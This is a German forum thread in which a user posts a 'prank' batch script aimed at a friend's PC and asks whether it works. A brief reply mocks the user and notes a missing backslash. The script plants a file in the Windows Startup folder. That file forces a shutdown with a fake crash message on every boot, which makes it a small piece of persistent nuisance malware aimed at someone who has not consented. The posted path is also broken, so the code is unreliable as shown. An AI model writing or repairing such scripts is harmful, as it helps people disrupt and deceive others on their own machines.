BATCH Datei Prank

Status
Für weitere Antworten geschlossen.

LordLali

Cadet 2nd Year
Hey Leute! o/
Ich habe einen Freund der fälschlicherweise behauptet, sich gut mit PCs auszukennen. Leider kennt er nicht die einfache Programmierung von Dateien durch Batch ;D, deswegen würde ich ihn gern trollen. Da ich mich selber ehrlich gesagt auch nicht viel besser auskenne als er, hab ich mir diese Datei durch mehrere Foren zusammengebastelt und möchte euch nun fragen ob sie sinnvoll bzw zweckerfüllend ist. Ich weiß, dass man keine Logs etc. in einen Thread schreiben soll, aber meine Datei ist sehr klein.
Danke für eure Hilfe und Kommentare, ich werde euch natürlich auch bekannt geben, ob es geklappt hat ;P.
Ergänzung ()

start
@echo off
set PFAD=C:\Users\!!!NAME!!!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
set DATEI=Windows_Betriebsystem.bat
set INHALT1=start
set INHALT2=@echo off
set INHALT3=start C:\Windows\System32\shutdown.exe -s -t 200 -c "Windows wird abgestürzt..."
set INHALT4=exit

echo %INHALT1% > %PFAD%%DATEI%
echo. >> %PFAD%%DATEI%
echo %INHALT2% >> %PFAD%%DATEI%
echo. >> %PFAD%%DATEI%
echo %INHALT3% >> %PFAD%%DATEI%
echo. >> %PFAD%%DATEI%
echo %INHALT4% >> %PFAD%%DATEI%

start C:\Users\!!!NAME!!!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows_Betriebsystem.bat
exit

Ja, das glaub ich dir, dass du keine Ahnung hast.
Hättest du das Ding mal bei dir getestet, wär dir schnell aufgefallen, dass da ein Backslash fehlt.
Und den ganzen Quatsch mit den variablen kannst du dir schenken, oder meinst du, dass es damit für den reingelegten unübersichtlicher werden soll?
Und bitte auch für solch kurze Schnipsel hier im Forum Code-Tags verwenden.

Geh bitte rechtzeitig schlafen, damit du morgen für den Kindergarten wieder fit bist.

Status
Für weitere Antworten geschlossen.
Zurück
Oben